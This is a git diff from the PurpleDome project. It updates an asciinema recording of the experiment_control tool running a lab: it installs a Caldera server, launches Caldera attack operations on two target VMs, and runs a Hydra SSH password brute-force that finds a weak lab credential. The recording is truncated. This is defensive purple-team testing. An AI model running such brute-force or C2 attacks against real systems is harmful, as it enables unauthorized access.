mirror of https://github.com/avast/PurpleDome
Updated core documentation rst files
parent
39286a82f9
commit
5436768e03
@ -1,167 +1,351 @@
|
||||
{"version": 2, "width": 203, "height": 24, "timestamp": 1612795107, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
|
||||
[0.02345, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
|
||||
[5.660723, "o", "python3 experiment_control.py run"]
|
||||
[7.06582, "o", "\r\n"]
|
||||
[44.774933, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n"]
|
||||
[46.671437, "o", "Connecting to vagrant@127.0.0.1:2222\r\n"]
|
||||
[46.674896, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"]
|
||||
[46.74413, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"]
|
||||
[47.578068, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"]
|
||||
[47.684336, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"]
|
||||
[47.684553, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"]
|
||||
[47.685026, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"]
|
||||
[47.685451, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"]
|
||||
[47.685891, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"]
|
||||
[47.686378, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"]
|
||||
[47.686752, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"]
|
||||
[47.687137, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"]
|
||||
[47.687526, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"]
|
||||
[47.688051, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"]
|
||||
[47.688487, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"]
|
||||
[47.688879, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"]
|
||||
[47.68924, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"]
|
||||
[47.689738, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"]
|
||||
[47.690142, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"]
|
||||
[47.690584, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"]
|
||||
[47.690978, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"]
|
||||
[47.691419, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"]
|
||||
[47.691924, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"]
|
||||
[47.692325, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"]
|
||||
[47.722896, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"]
|
||||
[47.723041, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"]
|
||||
[47.725655, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"]
|
||||
[47.734457, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"]
|
||||
[47.734806, "o", "Requirement already satisfied: requests!=2.18.0,>=2.14.2 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (2.24.0)\r\n"]
|
||||
[47.738412, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"]
|
||||
[47.740542, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"]
|
||||
[47.757208, "o", "Requirement already satisfied: docutils>=0.11 in /usr/lib/python3/dist-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.16)\r\n"]
|
||||
[47.757506, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"]
|
||||
[47.759656, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"]
|
||||
[47.774274, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"]
|
||||
[47.774601, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"]
|
||||
[47.775084, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"]
|
||||
[47.77542, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"]
|
||||
[47.775722, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
|
||||
[47.77616, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"]
|
||||
[47.776757, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
|
||||
[47.777259, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.4)\r\n"]
|
||||
[47.777573, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"]
|
||||
[47.777865, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"]
|
||||
[47.778304, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"]
|
||||
[47.778749, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"]
|
||||
[47.779242, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"]
|
||||
[47.785233, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"]
|
||||
[47.785653, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"]
|
||||
[47.804144, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"]
|
||||
[48.236742, "o", "WARNING: You are using pip version 20.3.3; however, version 21.0.1 is available.\r\nYou should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.\r\n"]
|
||||
[48.287567, "o", "\u001b[94mStarting Caldera server \u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"]
|
||||
[48.28936, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"]
|
||||
[58.373838, "o", "0 Trying to connect to http://192.168.178.83:8888 Caldera API\r\n"]
|
||||
[58.450802, "o", "Caldera: All systems nominal\r\n\u001b[92mCaldera server started \u001b[0m\r\n\u001b[94mpreparing target target1 ....\u001b[0m\r\n"]
|
||||
[58.450913, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
|
||||
[108.496761, "o", "\u001b[92mMachine created: target1\u001b[0m\r\n"]
|
||||
[108.49695, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
|
||||
[110.577613, "o", "\u001b[92mTarget running: target1 \u001b[0m\r\n\u001b[94mpreparing target target2 ....\u001b[0m\r\n"]
|
||||
[113.61404, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
|
||||
[113.647142, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
|
||||
[241.860699, "o", "\u001b[92mTarget running: target2 \u001b[0m\r\n\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"]
|
||||
[241.864951, "o", "List agents: ['target2w']\r\nConnecting to caldera http://192.168.178.83:8888, running agents are: ['target2w']\r\nMissing agent: target1 ...\r\n"]
|
||||
[241.864985, "o", "\r\nnohup /vagrant/target1/caldera_agent.sh start &\r\n \r\n\u001b[94mStarting Caldera client \u001b[0m\r\n"]
|
||||
[243.37839, "o", "Connecting to vagrant@127.0.0.1:2200\r\n"]
|
||||
[243.380729, "o", "<Connection host=127.0.0.1 user=vagrant port=2200>\r\n"]
|
||||
[243.970575, "o", "\u001b[92mCaldera client started \u001b[0m\r\n"]
|
||||
[248.98351, "o", "List agents: ['target2w', 'target1']\r\n\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target1\r\n"]
|
||||
[249.07589, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"]
|
||||
[249.078827, "o", ".\r\n"]
|
||||
[250.084198, "o", ".\r\n"]
|
||||
[251.089392, "o", ".\r\n"]
|
||||
[252.095383, "o", ".\r\n"]
|
||||
[253.100916, "o", ".\r\n"]
|
||||
[254.107019, "o", ".\r\n"]
|
||||
[255.113229, "o", ".\r\n"]
|
||||
[256.119078, "o", ".\r\n"]
|
||||
[257.124811, "o", ".\r\n"]
|
||||
[258.130561, "o", ".\r\n"]
|
||||
[259.136545, "o", ".\r\n"]
|
||||
[260.142284, "o", ".\r\n"]
|
||||
[261.147564, "o", ".\r\n"]
|
||||
[262.153097, "o", ".\r\n"]
|
||||
[263.159054, "o", ".\r\n"]
|
||||
[264.164656, "o", ".\r\n"]
|
||||
[265.170309, "o", ".\r\n"]
|
||||
[266.175776, "o", ".\r\n"]
|
||||
[267.181497, "o", ".\r\n"]
|
||||
[268.187033, "o", ".\r\n"]
|
||||
[269.192857, "o", ".\r\n"]
|
||||
[270.198772, "o", ".\r\n"]
|
||||
[271.20458, "o", ".\r\n"]
|
||||
[272.210351, "o", ".\r\n"]
|
||||
[273.215974, "o", ".\r\n"]
|
||||
[274.221582, "o", ".\r\n"]
|
||||
[275.227259, "o", ".\r\n"]
|
||||
[276.232114, "o", ".\r\n"]
|
||||
[277.238006, "o", ".\r\n"]
|
||||
[278.244737, "o", ".\r\n"]
|
||||
[279.250372, "o", ".\r\n"]
|
||||
[280.255877, "o", ".\r\n"]
|
||||
[281.261142, "o", ".\r\n"]
|
||||
[282.266827, "o", ".\r\n"]
|
||||
[283.276212, "o", ".\r\n"]
|
||||
[284.281898, "o", ".\r\n"]
|
||||
[285.292303, "o", "Output: vagrant\r\n"]
|
||||
[285.302496, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"]
|
||||
[285.331901, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"]
|
||||
[285.334009, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"]
|
||||
[285.540974, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:11\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"]
|
||||
[285.54132, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.78:22/\r\n"]
|
||||
[287.670203, "o", "[22][ssh] host: 192.168.178.78 login: password password: passw0rd\r\n"]
|
||||
[289.605076, "o", "1 of 1 target successfully completed, 1 valid password found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\n"]
|
||||
[289.605222, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"]
|
||||
[289.605332, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:15\r\n"]
|
||||
[289.633459, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target2w\r\n"]
|
||||
[289.735264, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"]
|
||||
[289.737673, "o", ".\r\n"]
|
||||
[290.743309, "o", ".\r\n"]
|
||||
[291.749143, "o", ".\r\n"]
|
||||
[292.75563, "o", ".\r\n"]
|
||||
[293.761762, "o", ".\r\n"]
|
||||
[294.767529, "o", ".\r\n"]
|
||||
[295.773933, "o", ".\r\n"]
|
||||
[296.779098, "o", ".\r\n"]
|
||||
[297.785246, "o", ".\r\n"]
|
||||
[298.79125, "o", ".\r\n"]
|
||||
[299.796894, "o", ".\r\n"]
|
||||
[300.803806, "o", ".\r\n"]
|
||||
[301.809912, "o", ".\r\n"]
|
||||
[302.81538, "o", ".\r\n"]
|
||||
[303.821704, "o", ".\r\n"]
|
||||
[304.827187, "o", ".\r\n"]
|
||||
[305.832174, "o", ".\r\n"]
|
||||
[306.837548, "o", ".\r\n"]
|
||||
[307.843364, "o", ".\r\n"]
|
||||
[308.849045, "o", ".\r\n"]
|
||||
[309.854627, "o", ".\r\n"]
|
||||
[310.859799, "o", ".\r\n"]
|
||||
[311.865091, "o", ".\r\n"]
|
||||
[312.871194, "o", ".\r\n"]
|
||||
[313.877016, "o", ".\r\n"]
|
||||
[314.883502, "o", ".\r\n"]
|
||||
[315.889784, "o", ".\r\n"]
|
||||
[316.895866, "o", ".\r\n"]
|
||||
[317.900879, "o", ".\r\n"]
|
||||
[318.905719, "o", ".\r\n"]
|
||||
[319.915607, "o", "Output: target2w\\purpledome\r\r\n"]
|
||||
[319.925076, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"]
|
||||
[319.943831, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"]
|
||||
[319.945699, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"]
|
||||
[320.026581, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:46\r\n"]
|
||||
[320.026727, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"]
|
||||
[320.026917, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.189:22/\r\n"]
|
||||
[323.093246, "o", "1 of 1 target completed, 0 valid password found\r\n"]
|
||||
[323.093366, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:49\r\n"]
|
||||
[323.107755, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mStopping machine: target1 \u001b[0m\r\n"]
|
||||
[387.451531, "o", "\u001b[92mMachine stopped: target1\u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"]
|
||||
[390.6315, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"]
|
||||
[395.805543, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"]
|
||||
[395.826481, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
|
||||
[398.414983, "o", "exit\r\n"]
|
||||
{"version": 2, "width": 148, "height": 47, "timestamp": 1623220625, "idle_time_limit": 0.5, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
|
||||
[0.016732, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
|
||||
[1.249977, "o", "python3 ./experiment_control.py -v run"]
|
||||
[1.8469, "o", "\r\n"]
|
||||
[1.989824, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
|
||||
[1.98994, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
|
||||
[44.497129, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"]
|
||||
[46.148337, "o", "zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[46.152243, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"]
|
||||
[46.60299, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"]
|
||||
[46.65791, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"]
|
||||
[46.658396, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"]
|
||||
[46.658948, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"]
|
||||
[46.659644, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"]
|
||||
[46.660103, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"]
|
||||
[46.660601, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"]
|
||||
[46.661215, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"]
|
||||
[46.661805, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"]
|
||||
[46.662547, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"]
|
||||
[46.66313, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"]
|
||||
[46.663676, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"]
|
||||
[46.664321, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"]
|
||||
[46.664861, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"]
|
||||
[46.665769, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"]
|
||||
[46.666323, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"]
|
||||
[46.675298, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"]
|
||||
[46.675664, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"]
|
||||
[46.676383, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"]
|
||||
[46.676888, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"]
|
||||
[46.677518, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"]
|
||||
[46.694408, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"]
|
||||
[46.705625, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"]
|
||||
[46.706241, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"]
|
||||
[46.719201, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"]
|
||||
[46.719573, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"]
|
||||
[46.720224, "o", "Requirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\n"]
|
||||
[46.720647, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"]
|
||||
[46.721477, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"]
|
||||
[46.722037, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"]
|
||||
[46.722637, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"]
|
||||
[46.723175, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\n"]
|
||||
[46.723793, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"]
|
||||
[46.72433, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"]
|
||||
[46.724817, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
|
||||
[46.725408, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"]
|
||||
[46.725894, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
|
||||
[46.726375, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\n"]
|
||||
[46.727076, "o", "Requirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\n"]
|
||||
[46.731192, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"]
|
||||
[46.744698, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"]
|
||||
[46.753132, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"]
|
||||
[46.75779, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"]
|
||||
[46.75982, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"]
|
||||
[46.763264, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"]
|
||||
[46.763892, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"]
|
||||
[46.779935, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"]
|
||||
[47.114079, "o", "Command exited with status 0.\r\n=== stdout ===\r\nDefaulting to user installation because normal site-packages is not writeable\r\nRequirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\nRequirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\nRequirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\nRequirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\nRequirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\nRequirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\nRequirement already satisfied: cryptography==2.8 in /h"]
|
||||
